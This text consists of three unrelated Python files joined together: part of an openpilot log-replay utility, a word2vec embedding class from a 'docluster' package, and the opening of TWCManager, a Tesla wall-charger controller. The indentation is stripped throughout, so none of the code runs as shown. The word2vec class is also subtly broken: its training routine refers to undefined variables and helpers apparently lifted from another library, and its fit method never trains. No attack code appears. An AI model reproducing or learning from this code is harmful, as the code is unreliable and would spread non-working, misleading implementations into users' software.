if abs(printed_at - route_time) > 5.:
print("at", route_time)
printed_at = route_time
if typ not in send_funcs and typ != 'vipc':
if typ in address_mapping:
# Remove so we don't keep printing warnings.
address = address_mapping.pop(typ)
try:
print("binding", typ)
send_funcs[typ] = _get_address_send_func(address)
except Exception as e:
print("couldn't replay {}: {}".format(typ, e))
continue
else:
# Skip messages that we are not registered to publish.
continue
# Sleep as needed for real time playback.
if run_realtime:
msg_time_offset = msg_time_seconds - msg_start_time
real_time_offset = realtime.sec_since_boot() - real_start_time
lag = msg_time_offset - real_time_offset
if lag > 0 and lag < 30: # a large jump is OK, likely due to an out of order segment
if lag > 1:
print("sleeping for", lag)
time.sleep(lag)
elif lag < -1:
# Relax the real time schedule when we slip far behind.
reset_time = True
# Send message.
try:
if typ == VIPC_TYP and (not no_visionipc):
if vipc_server is None:
vipc_server = _get_vipc_server(len(msg_bytes))
i, sof, eof = extra[0]
vipc_server.send(VisionStreamType.VISION_STREAM_RGB_BACK, msg_bytes, i, sof, eof)
if typ != VIPC_TYP:
send_funcs[typ](msg_bytes)
except MultiplePublishersError:
del send_funcs[typ]
def timestamp_to_s(tss):
return time.mktime(datetime.strptime(tss, '%Y-%m-%d--%H-%M-%S').timetuple())
def absolute_time_str(s, start_time):
try:
# first try if it's a float
return float(s)
except ValueError:
# now see if it's a timestamp
return timestamp_to_s(s) - start_time
def _get_address_mapping(args):
if args.min is not None:
services_to_mock = [
'deviceState', 'can', 'pandaState', 'sensorEvents', 'gpsNMEA', 'roadCameraState', 'roadEncodeIdx',
'modelV2', 'liveLocation',
]
elif args.enabled is not None:
services_to_mock = args.enabled
else:
services_to_mock = service_list.keys()
address_mapping = {service_name: service_name for service_name in services_to_mock}
address_mapping.update(dict(args.address_mapping))
for k in args.disabled:
address_mapping.pop(k, None)
non_services = set(address_mapping) - set(service_list)
if non_services:
print("WARNING: Unknown services {}".format(list(non_services)))
return address_mapping
def keyboard_controller_thread(q, route_start_time):
print("keyboard waiting for input")
kb = KBHit()
while 1:
c = kb.getch()
if c == 'm': # Move forward by 1m
q.send_pyobj(SeekRelativeTime(60))
elif c == 'M': # Move backward by 1m
q.send_pyobj(SeekRelativeTime(-60))
elif c == 's': # Move forward by 10s
q.send_pyobj(SeekRelativeTime(10))
elif c == 'S': # Move backward by 10s
q.send_pyobj(SeekRelativeTime(-10))
elif c == 'G': # Move backward by 10s
q.send_pyobj(SeekAbsoluteTime(0.))
elif c == "\x20": # Space bar.
q.send_pyobj(TogglePause())
elif c == "\n":
try:
seek_time_input = input('time: ')
seek_time = absolute_time_str(seek_time_input, route_start_time)
# If less than 60, assume segment number
if seek_time < 60:
seek_time *= 60
q.send_pyobj(SeekAbsoluteTime(seek_time))
except Exception as e:
print("Time not understood: {}".format(e))
def get_arg_parser():
parser = argparse.ArgumentParser(
description="Mock openpilot components by publishing logged messages.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("route_name", type=(lambda x: x.replace("#", "|")), nargs="?",
help="The route whose messages will be published.")
parser.add_argument("data_dir", nargs='?', default=os.getenv('UNLOGGER_DATA_DIR'),
help="Path to directory in which log and camera files are located.")
parser.add_argument("--no-loop", action="store_true", help="Stop at the end of the replay.")
def key_value_pair(x):
return x.split("=")
parser.add_argument("address_mapping", nargs="*", type=key_value_pair,
help="Pairs <service>=<zmq_addr> to publish <service> on <zmq_addr>.")
def comma_list(x):
return x.split(",")
to_mock_group = parser.add_mutually_exclusive_group()
to_mock_group.add_argument("--min", action="store_true", default=os.getenv("MIN"))
to_mock_group.add_argument("--enabled", default=os.getenv("ENABLED"), type=comma_list)
parser.add_argument("--disabled", type=comma_list, default=os.getenv("DISABLED") or ())
parser.add_argument(
"--tl", dest="publish_time_length", type=float, default=None,
help="Length of interval in event time for which messages should be published.")
parser.add_argument(
"--no-realtime", dest="realtime", action="store_false", default=True,
help="Publish messages as quickly as possible instead of realtime.")
parser.add_argument(
"--no-interactive", dest="interactive", action="store_false", default=True,
help="Disable interactivity.")
parser.add_argument(
"--bind-early", action="store_true", default=False,
help="Bind early to avoid dropping messages.")
parser.add_argument(
"--no-visionipc", action="store_true", default=False,
help="Do not output video over visionipc")
parser.add_argument(
"--start-time", type=float, default=0.,
help="Seek to this absolute time (in seconds) upon starting playback.")
return parser
def main(argv):
args = get_arg_parser().parse_args(sys.argv[1:])
command_address = "ipc:///tmp/{}".format(uuid4())
forward_commands_address = "ipc:///tmp/{}".format(uuid4())
data_address = "ipc:///tmp/{}".format(uuid4())
address_mapping = _get_address_mapping(args)
command_sock = zmq.Context.instance().socket(zmq.PUSH)
command_sock.connect(command_address)
if args.route_name is not None:
route_name_split = args.route_name.split("|")
if len(route_name_split) > 1:
route_start_time = timestamp_to_s(route_name_split[1])
else:
route_start_time = 0
command_sock.send_pyobj(
SetRoute(args.route_name, args.start_time, args.data_dir))
else:
print("waiting for external command...")
route_start_time = 0
subprocesses = {}
try:
subprocesses["data"] = multiprocessing.Process(
target=UnloggerWorker().run,
args=(forward_commands_address, data_address, address_mapping.copy()))
subprocesses["control"] = multiprocessing.Process(
target=unlogger_thread,
args=(command_address, forward_commands_address, data_address, args.realtime,
_get_address_mapping(args), args.publish_time_length, args.bind_early, args.no_loop, args.no_visionipc))
subprocesses["data"].start()
subprocesses["control"].start()
# Exit if any of the children die.
def exit_if_children_dead(*_):
for _, p in subprocesses.items():
if not p.is_alive():
[p.terminate() for p in subprocesses.values()]
exit()
signal.signal(signal.SIGCHLD, signal.SIG_IGN)
signal.signal(signal.SIGCHLD, exit_if_children_dead)
if args.interactive:
keyboard_controller_thread(command_sock, route_start_time)
else:
# Wait forever for children.
while True:
time.sleep(10000.)
finally:
for p in subprocesses.values():
if p.is_alive():
try:
p.join(3.)
except multiprocessing.TimeoutError:
p.terminate()
continue
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
word2vec.py | import collections
import math
import multiprocessing
import os
import random
import threading
from copy import deepcopy
import pandas as pd
import numpy as np
import tensorflow as tf
from docluster.core import Model
from docluster.core.document_embedding import TfIdf
from docluster.core.preprocessing import Preprocessor, TokenFilter
from docluster.utils.constants import DistanceMetric, FileType
from docluster.utils.data_fetcher import FileFetcher
from docluster.utils.data_saver import FileSaver
from scipy.special import expit
from .word_embeddings import WordEmbeddings
class Word2Vec(Model):
def __init__(self, preprocessor=None, n_skips=16, n_negative_samples=100, n_words=10000, embedding_size=100, batch_size=32, window_size=10, learning_rate=0.025, n_epochs=1, n_workers=4, do_plot=False):
"""
A Skip-Gram model Word2Vec with multi-thread training capability.
Paramaters:
-----------
preprocessor : Preprocessor
The preprocessor that will tokenize the documents.
The default one also filters punctuation, tokens with numeric
characters and one letter words. Furthermore, no stemming or
lemmatization is applied. All these can be adjusted
by passing a custom preprocessor.
n_skip : int
The number of skips.
n_negative_samples : int
The number of negative samples that are going to collected for each
batch.
n_words : int
The number of words that the vocabulary will have. The filtering is
based on the word frequency. Therefore, less frequent words will not
be included in the vocabulary.
embedding_size : int
The size of the embedding vectors. Usually the more makes the embeddings
more accurate, but this is not always the case. Increasing the size
dramatically affects trainning time.
batch_size : int
The batch size.
window_size : int
The window size where the words to the left and to the right of the words
will give context to the word.
learning_rate : int
The initial learning rate of the gradient decent.
n_epochs : int
The number of epoches the model is going to be trained. Increasing the number
dramatically affects trainning time.
n_workers : int
The number of workers that is going to train the model concurrently.
It is not recommended to use more than the number of core.
do_plot : bool
Attributes:
-----------
embeddings :
The embedding vectors that represents each word
"""
if preprocessor is None:
additional_filters = [lambda token: len(token) == 1]
token_filter = TokenFilter(filter_stop_words=False,
additional_filters=additional_filters)
preprocessor = Preprocessor(do_stem=False, do_lemmatize=False,
parse_html=False, token_filter=token_filter, lower=False)
self.preprocessor = preprocessor
self.n_skips = n_skips
self.n_negative_samples = n_negative_samples
self.embedding_size = embedding_size
self.batch_size = batch_size
self.window_size = window_size
self.learning_rate = learning_rate
self.n_epochs = n_epochs
self.n_words = n_words
self.n_workers = n_workers
self._total_loss = 0
self._dist_metric = DistanceMetric.cosine
self.embeddings = WordEmbeddings(size=embedding_size, n_words=n_words)
self.locks = np.ones(n_words)
self.syn1 = np.zeros((n_words, embedding_size))
self.syn1neg = np.zeros((n_words, embedding_size))
def fit(self, documents):
"""
Train the Word2Vec model with the documents.
Paramaters:
-----------
documents : list(str)
the documents that the Word2Vec model is going to learn the embeddings from.
"""
n_words_trained = 0
tokens, self.vocab, data, self._frequencies, self.diction, self.reverse_diction = self._build_dataset(
documents)
n_tokens = len(tokens)
n_vocab = len(self.vocab)
words_per_epoch = n_vocab / self.n_epochs
self._cum_dist = self._build_cum_dist()
def _build_dataset(self, documents):
"""Preprocesses the documents and creates the dataset for fitting."""
# Get the term frequencies without idf
tfidf = TfIdf(do_idf=False, preprocessor=self.preprocessor, n_words=self.n_words)
tfidf.fit(documents)
# Flatten the document tokens to create one long list
tokens = list(np.hstack(np.array(tfidf.document_tokens)))
# Create the vocab list with 'UNK' for vocab that couldn't make the vocab list
vocab = tfidf.vocab
vocab_set = set(vocab)
diction = {token: index for index, token in enumerate(vocab)}
reverse_diction = dict(zip(diction.values(), diction.keys()))
# Turn the long token list into a index references to the diction
data = list(map(lambda token: diction[token]
if token in vocab_set else 0, tokens))
# Get the frequencies of tokens and add the frequency of 'UNK' at the beginning
# frequencies = np.insert(tfidf.total_term_freq, 0, data.count(0))[:self.n_words]
frequencies = tfidf.total_term_freq[:self.n_words]
return tokens, vocab, data, frequencies, diction, reverse_diction
def _build_cum_dist(self, distortion=0.75, domain=2**31 - 1):
freq_total = np.sum(self._frequencies ** distortion)
cum_dist = np.cumsum(self._frequencies) * domain / freq_total
return cum_dist
def _train(self, data, optimizer, loss):
"""Train the model."""
start_index = 0
init_op = tf.global_variables_initializer()
with tf.Session() as sess:
self._sess = sess
self._sess.run(init_op)
for epoch in range(self.n_epochs):
self._train_one_epoch(data, optimizer, loss)
print("Epoch:", (epoch + 1))
self.embeddings = self._embeddings.eval()
print("\nTraining complete!")
def _train_one_example(self, example, label, alpha):
predict_word = model.wv.vocab[word] # target word (NN output)
# input word (NN input/projection layer)
example_index = self._diction[example]
embedding = self.embeddings.vectors[example_index]
lock = self.locks[example_index]
# work on the entire tree at once, to push as much work into numpy's C routines as possible (performance)
# 2d matrix, codelen x layer1_size
l2a = deepcopy(self.syn1[predict_word.point])
prod_term = np.dot(embedding, l2a.T)
fa = expit(prod_term) # propagate hidden -> output
# vector of error gradients multiplied by the learning rate
ga = (1 - predict_word.code - fa) * alpha
if learn_hidden:
model.syn1[predict_word.point] += outer(ga, l1) # learn hidden -> output
sgn = (-1.0)**predict_word.code # `ch` function, 0 -> 1, 1 -> -1
lprob = -log(expit(-sgn * prod_term))
self._total_loss += sum(lprob)
if model.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [predict_word.index]
while len(word_indices) < model.negative + 1:
w = model.cum_table.searchsorted(
model.random.randint(model.cum_table[-1]))
if w != predict_word.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
prod_term = dot(l1, l2b.T)
fb = expit(prod_term) # propagate hidden -> output
# vector of error gradients multiplied by the learning rate
gb = (model.neg_labels - fb) * alpha
if learn_hidden:
model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
# loss component corresponding to negative sampling
if compute_loss:
# for the sampled words
self._total_loss -= sum(log(expit(-1 * prod_term[1:])))
# for the output word
self._total_loss -= log(expit(prod_term[0]))
if learn_vectors:
# learn input -> hidden (mutates model.wv.syn0[word2.index], if that is l1)
embedding += neu1e * lock_factor
def _train_one_epoch(self, data, optimizer, loss):
"""Train one epoch with workers."""
# Each worker generates a batch and trains it until posion pill
def worker_duty():
"""The duty of a single worker."""
while True:
batch = queue.get()
if batch is None:
break
examples, labels, alphas = batch
for example, label, alpha in batch:
self._train_one_example(example, label, alpha)
def generate_batch():
"""Create a batch for a training step in Word2Vec."""
# Initialize variables
example = np.zeros(self.batch_size)
labels = np.zeros((self.batch_size, 1))
alphas = np.zeros(self.batch_size)
n_items = 0
index = 0
while index < len(data):
reduced_window = random.randint(0, self.window_size)
if data[index] is not None:
left = max(0, index - self.window_size + reduced_window)
right = min((index + self.window_size + 1 -
reduced_window), len(data) - 1)
for pos2 in range(left, right, 1):
if n_items == self.batch_size:
queue.put((example, labels, index))
example = np.zeros(self.batch_size)
labels = np.zeros((self.batch_size, 1))
n_items = 0
if pos2 != index and data[pos2] is not None:
example[n_items] = data[pos2]
labels[n_items] = data[index]
alpha = self.learning_rate - \
(self.learning_rate - 0.001) * (index / self.n_words)
alphas[n_items] = max(0.001, alpha)
n_items += 1
index += 1
# Poison pills
for _ in range(n_workers):
queue.put(None)
# Create a threadsafe queue to store the batch indexes
queue = multiprocessing.Queue(maxsize=2 * self.n_workers)
# Create and run the threads
workers = [threading.Thread(target=generate_batch)]
workers.extend([threading.Thread(target=worker_duty)
for _ in range(self.n_workers - 1)])
for worker in workers:
worker.start()
for thread in workers:
thread.join()
def most_similar_words(self, word, n_words=5, include_similarity=False):
"""
Get the most similar words to a word.
Paramaters:
-----------
word : list(str)
The word that is the point of intrest.
n_words : int
The number of words that is going to be returned.
include_similarity : bool
If to include the similarity score as part of a tuple next to the words.
Return:
-------
similar_words : list(str) or list(tuple(str, float))
The words that are most similar to the word according to the trained
embeddings.
"""
if word in self.vocab:
token_id = self.diction[word]
tiled_embedding = np.tile(self.embeddings[token_id], (self.n_words, 1))
embedding_similarities = self._dist_metric(tiled_embedding, self.embeddings)
most_similar_token_ids = (-embedding_similarities).argsort()
return list(map(lambda token_id: self.reverse_diction[token_id], most_similar_token_ids))
else:
print('not in vocab')
def save_model(self, model_name, file_type=FileType.csv, safe=True, directory_path=None):
"""
Save the fitted model.
Paramaters:
-----------
model_name : str
The model name (also the file name) of the model is going to be saved under.
file_type : FileType
The file type that the model is going to be saved as.
Return:
-------
saved : bool
If the model is saved successfully or not.
"""
if self.embeddings is None:
return False
data = pd.DataFrame(self.embeddings.T)
data.columns = self.vocab
if directory_path:
file_saver = FileSaver(directory_path=directory_path)
else:
file_saver = FileSaver()
return file_saver.save(data, model_name, file_type=file_type, safe=safe)
def load_model(self, model_name, file_type=FileType.csv, directory_path=None):
if directory_path:
file_fetcher = FileFetcher(directory_path=directory_path)
else:
file_fetcher = FileFetcher()
self.n_words += 1
data = file_fetcher.load(model_name, file_type)
self.embeddings = data.as_matrix().T
self.vocab = data.columns.tolist()
self.diction = {token: index for index, token in enumerate(self.vocab)}
self.reverse_diction = dict(zip(self.diction.values(), self.diction.keys()))
|
TWCManager.py | #! /usr/bin/python3
################################################################################
# Code and TWC protocol reverse engineering by Chris Dragon.
#
# Additional logs and hints provided by Teslamotorsclub.com users:
# TheNoOne, IanAmber, and twc.
# Thank you!
#
# For support and information, please read through this thread:
# https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830
#
# Report bugs at https://github.com/ngardiner/TWCManager/issues
#
# This software is released under the "Unlicense" model: http://unlicense.org
# This means source code and TWC protocol knowledge are released to the general
# public free for personal or commercial use. I hope the knowledge will be used
# to increase the use of green energy sources by controlling the time and power
# level of car charging.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please visit http://unlicense.org
import commentjson
import importlib
import json
import logging
import os.path
import math
import re
import sys
import time
import traceback
from datetime import datetime
import threading
from ww import f
from TWCManager.TWCMaster import TWCMaster
import requests
from enum import Enum
logging.addLevelName(19, "INFO2")
logging.addLevelName(18, "INFO4")
logging.addLevelName(17, "INFO4")
logging.addLevelName(16, "INFO5")
logging.addLevelName(15, "INFO6")
logging.addLevelName(14, "INFO7")
logging.addLevelName(13, "INFO8")
logging.addLevelName(12, "INFO9")
logging.addLevelName(9, "DEBUG2")
logging.INFO2 = 19
logging.INFO3 = 18
logging.INFO4 = 17
logging.INFO5 = 16
logging.INFO6 = 15
logging.INFO7 = 14
logging.INFO8 = 13
logging.INFO9 = 12
logging.DEBUG2 = 9
logger = logging.getLogger("\u26FD Manager")
# Define available modules for the instantiator
# All listed modules will be loaded at boot time
# Logging modules should be the first one to load
modules_available = [
"Logging.ConsoleLogging",
"Logging.FileLogging",
"Logging.SentryLogging",
"Logging.CSVLogging",
"Logging.MySQLLogging",
"Logging.SQLiteLogging",
"Protocol.TWCProtocol",
"Interface.Dummy",
"Interface.RS485",
"Interface.TCP",
"Policy.Policy",
"Vehicle.TeslaAPI",
"Vehicle.TeslaMateVehicle",
"Control.WebIPCControl",
"Control.HTTPControl",
"Control.MQTTControl",
# "Control.OCPPControl",
"EMS.Efergy",
"EMS.Enphase",
"EMS.Fronius",
"EMS.Growatt",
"EMS.HASS",
"EMS.IotaWatt",
"EMS.Kostal",
"EMS.OpenHab",
"EMS.OpenWeatherMap",
"EMS.P1Monitor",
"EMS.SmartMe",
"EMS.SmartPi",
"EMS.SolarEdge",
"EMS.SolarLog",
"EMS.TeslaPowerwall2",
"EMS.TED",
"EMS.Volkszahler",
"EMS.URL",
"Status.HASSStatus",
"Status.MQTTStatus",
]
# Enable support for Python Visual Studio Debugger
if "DEBUG_SECRET" in os.environ:
import ptvsd
ptvsd.enable_attach(os.environ["DEBUG_SECRET"])
ptvsd.wait_for_attach()
##########################
# Load Configuration File
config = None
jsonconfig = None
if os.path.isfile("/etc/twcmanager/config.json"):
jsonconfig = open("/etc/twcmanager/config.json")
else:
if os.path.isfile("config.json"):
jsonconfig = open("config.json")
if jsonconfig:
config = commentjson.load(jsonconfig)
else:
logger.error("Unable to find a configuration file.")
sys.exit()
logLevel = config["config"].get("logLevel")
if logLevel == None:
debugLevel = config["config"].get("debugLevel", 1)
debug_to_log = {
0: 40,
1: 20,
2: 19,
3: 18,
4: 17,
5: 16,
6: 15,
7: 14,
8: 13,
9: 12,
10: 10,
11: 9,
}
for debug, log in debug_to_log.items():
if debug >= debugLevel:
logLevel = log
break
logging.getLogger().setLevel(logLevel)
# All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our
# fake TWC ID. There is a 1 in 64535 chance that this ID will match each real
# TWC on the network, in which case you should pick a different random id below.
# This isn't really too important because even if this ID matches another TWC on
# the network, that TWC will pick its own new random ID as soon as it sees ours
# conflicts.
fakeTWCID = bytearray(b"\x77\x77")
#
# End configuration parameters
#
##############################
##############################
#
# Begin functions
#
def hex_str(s: str):
return " ".join("{:02X}".format(ord(c)) for c in s)
def hex_str(ba: bytearray):
return " ".join("{:02X}".format(c) for c in ba)
def time_now():
global config
return datetime.now().strftime(
"%H:%M:%S" + (".%f" if config["config"]["displayMilliseconds"] else "")
)
def unescape_msg(inmsg: bytearray, msgLen):
# Given a message received on the RS485 network, remove leading and trailing
# C0 byte, unescape special byte values, and verify its data matches the CRC
# byte.
# Note that a bytearray is mutable, whereas a bytes object isn't.
# By initializing a bytearray and concatenating the incoming bytearray
# to it, we protect against being passed an immutable bytes object
msg = bytearray() + inmsg[0:msgLen]
# See notes in RS485.send() for the way certain bytes in messages are escaped.
# We basically want to change db dc into c0 and db dd into db.
# Only scan to one less than the length of the string to avoid running off
# the end looking at i+1.
i = 0
while i < len(msg):
if msg[i] == 0xDB:
if msg[i + 1] == 0xDC:
# Replace characters at msg[i] and msg[i+1] with 0xc0,
# shortening the string by one character. In Python, msg[x:y]
# refers to a substring starting at x and ending immediately
# before y. y - x is the length of the substring.
msg[i : i + 2] = [0xC0]
elif msg[i + 1] == 0xDD:
msg[i : i + 2] = [0xDB]
else:
logger.info(
"ERROR: Special character 0xDB in message is "
"followed by invalid character 0x%02X. "
"Message may be corrupted." % (msg[i + 1])
)
# Replace the character with something even though it's probably
# not the right thing.
msg[i : i + 2] = [0xDB]
i = i + 1
# Remove leading and trailing C0 byte.
msg = msg[1 : len(msg) - 1]
return msg
def background_tasks_thread(master):
carapi = master.getModuleByName("TeslaAPI")
while True:
try:
task = master.getBackgroundTask()
if "cmd" in task:
if task["cmd"] == "applyChargeLimit":
carapi.applyChargeLimit(limit=task["limit"])
elif task["cmd"] == "charge":
# car_api_charge does nothing if it's been under 60 secs since it
# was last used so we shouldn't have to worry about calling this
# too frequently.
carapi.car_api_charge(task["charge"])
elif task["cmd"] == "carApiEmailPassword":
carapi.resetCarApiLastErrorTime()
carapi.car_api_available(task["email"], task["password"])
elif task["cmd"] == "checkArrival":
limit = (
carapi.lastChargeLimitApplied
if carapi.lastChargeLimitApplied != 0
else -1
)
carapi.applyChargeLimit(limit=limit, checkArrival=True)
elif task["cmd"] == "checkCharge":
carapi.updateChargeAtHome()
elif task["cmd"] == "checkDeparture":
carapi.applyChargeLimit(
limit=carapi.lastChargeLimitApplied, checkDeparture=True
)
elif task["cmd"] == "checkGreenEnergy":
check_green_energy()
elif task["cmd"] == "checkVINEntitlement":
# The two possible arguments are task["subTWC"] which tells us
# which TWC to check, or task["vin"] which tells us which VIN
if task.get("vin", None):
task["subTWC"] = master.getTWCbyVIN(task["vin"])
if task["subTWC"]:
if master.checkVINEntitlement(task["subTWC"]):
logger.info(
"Vehicle %s on TWC %02X%02X is permitted to charge."
% (
task["subTWC"].currentVIN,
task["subTWC"].TWCID[0],
task["subTWC"].TWCID[1],
)
)
else:
logger.info(
"Vehicle %s on TWC %02X%02X is not permitted to charge. Terminating session."
% (
task["subTWC"].currentVIN,
task["subTWC"].TWCID[0],
task["subTWC"].TWCID[1],
)
)
master.sendStopCommand(task["subTWC"].TWCID)
elif task["cmd"] == "getLifetimekWh":
master.getSlaveLifetimekWh()
elif task["cmd"] == "getVehicleVIN":
master.getVehicleVIN(task["slaveTWC"], task["vinPart"])
elif task["cmd"] == "snapHistoryData":
master.snapHistoryData()
elif task["cmd"] == "updateStatus":
update_statuses()
elif task["cmd"] == "webhook":
if config["config"].get("webhookMethod", "POST") == "GET":
requests.get(task["url"])
else:
body = master.getStatus()
requests.post(task["url"], json=body)
elif task["cmd"] == "saveSettings":
master.saveSettings()
except:
logger.info(
"%s: "
+ traceback.format_exc()
+ ", occurred when processing background task",
"BackgroundError",
extra={"colored": "red"},
)
pass
# task_done() must be called to let the queue know the task is finished.
# backgroundTasksQueue.join() can then be used to block until all tasks
# in the queue are done.
master.doneBackgroundTask(task)
def check_green_energy():
global config, hass, master
# Check solar panel generation using an API exposed by
# the HomeAssistant API.
#
# You may need to customize the sensor entity_id values
# to match those used in your environment. This is configured
# in the config section at the top of this file.
#
# Poll all loaded EMS modules for consumption and generation values
for module in master.getModulesByType("EMS"):
master.setConsumption(module["name"], module["ref"].getConsumption())
master.setGeneration(module["name"], module["ref"].getGeneration())
# Set max amps iff charge_amps isn't specified on the policy.
if master.getModuleByName("Policy").policyIsGreen():
master.setMaxAmpsToDivideAmongSlaves(master.getMaxAmpsToDivideGreenEnergy())
def update_statuses():
# Print a status update if we are on track green energy showing the
# generation and consumption figures
maxamps = master.getMaxAmpsToDivideAmongSlaves()
maxampsDisplay = f("{maxamps:.2f}A")
if master.getModuleByName("Policy").policyIsGreen():
genwatts = master.getGeneration()
conwatts = master.getConsumption()
conoffset = master.getConsumptionOffset()
chgwatts = master.getChargerLoad()
othwatts = 0
if config["config"]["subtractChargerLoad"]:
if conwatts > 0:
othwatts = conwatts - chgwatts
if conoffset > 0:
othwatts -= conoffset
# Extra parameters to send with logs
logExtra = {
"logtype": "green_energy",
"genWatts": genwatts,
"conWatts": conwatts,
"chgWatts": chgwatts,
"colored": "magenta",
}
if (genwatts or conwatts) and (not conoffset and not othwatts):
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s)",
f("{genwatts:.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
extra=logExtra,
)
elif (genwatts or conwatts) and othwatts and not conoffset:
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s)",
f("{genwatts:.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
f("{othwatts:.0f}W"),
extra=logExtra,
)
elif (genwatts or conwatts) and othwatts and conoffset > 0:
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s, Offset %s)",
f("{genwatts:.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
f("{othwatts:.0f}W"),
f("{conoffset:.0f}W"),
extra=logExtra,
)
elif (genwatts or conwatts) and othwatts and conoffset < 0:
logger.info(
"Green energy Generates %s (Offset %s), Consumption %s (Charger Load %s, Other Load %s)",
f("{genwatts:.0f}W"),
f("{(-1 * conoffset):.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
f("{othwatts:.0f}W"),
extra=logExtra,
)
nominalOffer = master.convertWattsToAmps(
genwatts
+ (
chgwatts
if (config["config"]["subtractChargerLoad"] and conwatts == 0)
else 0
)
- (
conwatts
- (
chgwatts
if (config["config"]["subtractChargerLoad"] and conwatts > 0)
else 0
)
)
)
if abs(maxamps - nominalOffer) > 0.005:
nominalOfferDisplay = f("{nominalOffer:.2f}A")
logger.debug(
f(
"Offering {maxampsDisplay} instead of {nominalOfferDisplay} to compensate for inexact current draw"
)
)
conwatts = genwatts - master.convertAmpsToWatts(maxamps)
generation = f("{master.convertWattsToAmps(genwatts):.2f}A")
consumption = f("{master.convertWattsToAmps(conwatts):.2f}A")
logger.info(
"Limiting charging to %s - %s = %s.",
generation,
consumption,
maxampsDisplay,
extra={"colored": "magenta"},
)
else:
# For all other modes, simply show the Amps to charge at
logger.info(
"Limiting charging to %s.", maxampsDisplay, extra={"colored": "magenta"}
)
# Print minimum charge for all charging policies
minchg = f("{config['config']['minAmpsPerTWC']}A")
logger.info(
"Charge when above %s (minAmpsPerTWC).", minchg, extra={"colored": "magenta"}
)
# Update Sensors with min/max amp values
for module in master.getModulesByType("Status"):
module["ref"].setStatus(
bytes("config", "UTF-8"),
"min_amps_per_twc",
"minAmpsPerTWC",
config["config"]["minAmpsPerTWC"],
"A",
)
module["ref"].setStatus(
bytes("all", "UTF-8"),
"max_amps_for_slaves",
"maxAmpsForSlaves",
master.getMaxAmpsToDivideAmongSlaves(),
"A",
)
#
# End functions
#
##############################
##############################
#
# Begin global vars
#
data = ""
dataLen = 0
ignoredData = bytearray()
msg = bytearray()
msgLen = 0
numInitMsgsToSend = 10
msgRxCount = 0
idxSlaveToSendNextHeartbeat = 0
timeLastkWhDelivered = time.time()
timeLastkWhSaved = time.time()
timeLastHeartbeatDebugOutput = 0
webMsgPacked = ""
webMsgMaxSize = 300
webMsgResult = 0
timeTo0Aafter06 = 0
timeToRaise2A = 0
#
# End global vars
#
##############################
##############################
#
# Begin main program
#
# Instantiate necessary classes
master = TWCMaster(fakeTWCID, config)
# Instantiate all modules in the modules_available list automatically
for module in modules_available:
modulename = []
if str(module).find(".") != -1:
modulename = str(module).split(".")
try:
# Pre-emptively skip modules that we know are not configured
configlocation = master.translateModuleNameToConfig(modulename)
if (
not config.get(configlocation[0], {})
.get(configlocation[1], {})
.get("enabled", 1)
):
# We can see that this module is explicitly disabled in config, skip it
continue
moduleref = importlib.import_module("TWCManager." + module)
modclassref = getattr(moduleref, modulename[1])
modinstance = modclassref(master)
# Register the new module with master class, so every other module can
# interact with it
master.registerModule(
{"name": modulename[1], "ref": modinstance, "type": modulename[0]}
)
except ImportError as e:
logger.error(
"%s: " + str(e) + ", when importing %s, not using %s",
"ImportError",
module,
module,
extra={"colored": "red"},
)
except ModuleNotFoundError as e:
logger.info(
"%s: " + str(e) + ", when importing %s, not using %s",
"ModuleNotFoundError",
module,
module,
extra={"colored": "red"},
)
except:
raise
# Load settings from file
master.loadSettings()
# Create a background thread to handle tasks that take too long on the main
# thread. For a primer on threads in Python, see:
# http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/
backgroundTasksThread = threading.Thread(target=background_tasks_thread, args=(master,))
backgroundTasksThread.daemon = True
backgroundTasksThread.start()
logger.info(
"TWC Manager starting as fake %s with id %02X%02X and sign %02X"
% (
("Master" if config["config"]["fakeMaster"] else "Slave"),
ord(fakeTWCID[0:1]),
ord(fakeTWCID[1:2]),
ord(master.getSlaveSign()),
)
)
while True:
try:
# In this area, we always send a linkready message when we first start.
# Whenever there is no data available from other TWCs to respond to,
# we'll loop back to this point to send another linkready or heartbeat
# message. By only sending our periodic messages when no incoming
# message data is available, we reduce the chance that we will start
# transmitting a message in the middle of an incoming message, which
# would corrupt both messages.
# Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means
# less power used and less waste heat.
time.sleep(0.025)
now = time.time()
if config["config"]["fakeMaster"] == 1:
# A real master sends 5 copies of linkready1 and linkready2 whenever
# it starts up, which we do here.
# It doesn't seem to matter if we send these once per second or once
# per 100ms so I do once per 100ms to get them over with.
if numInitMsgsToSend > 5:
master.send_master_linkready1()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend -= 1
elif numInitMsgsToSend > 0:
master.send_master_linkready2()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend = numInitMsgsToSend - 1
else:
# After finishing the 5 startup linkready1 and linkready2
# messages, master will send a heartbeat message to every slave
# it's received a linkready message from. Do that here.
# A real master would keep sending linkready messages periodically
# as long as no slave was connected, but since real slaves send
